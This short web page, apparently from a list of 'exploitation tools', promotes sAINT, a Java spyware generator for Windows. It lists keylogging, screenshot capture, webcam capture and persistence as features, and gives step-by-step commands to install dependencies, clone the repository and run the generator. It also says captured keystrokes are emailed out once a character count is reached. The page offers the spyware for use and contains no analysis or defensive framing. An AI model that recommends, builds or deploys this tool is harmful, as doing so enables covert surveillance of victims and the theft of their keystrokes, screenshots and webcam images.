Exploitation Tools

sAINT – A Spyware Generator for Windows systems written in Java

s)AINT is a Spyware Generator for Windows systems written in Java.

Features

  • Keylogger
  • Take Screenshot
  • Webcam Capture
  • Persistence

Tested On
Kali Linux – ROLLING EDITION

How To Use

# Install dependencies (you need Maven and JDK 8 package installed)
$ apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y

# To generate a .EXE using launch4j are necessary the following packages
$ apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y

# Clone this repository
$ git clone https://github.com/tiagorlampert/sAINT.git

# Go into the repository
$ cd sAINT

# Install and configure Maven libraries
$ sudo chmod +x configure.sh
$ ./configure.sh

# Run
$ java -jar sAINT.jar

E-mail will be sent when it reaches the specified number of characters. Optionally you can enable Screenshot, Webcam Capture and Persistence.

Screenshot

Maven dependencies

Generate spyware

Run

Install Java JRE 8

Run .EXE

or Run .JAR

Data

Local

E-mail

How to uninstall
To uninstall run UNINSTALL.bat with administrative permissions.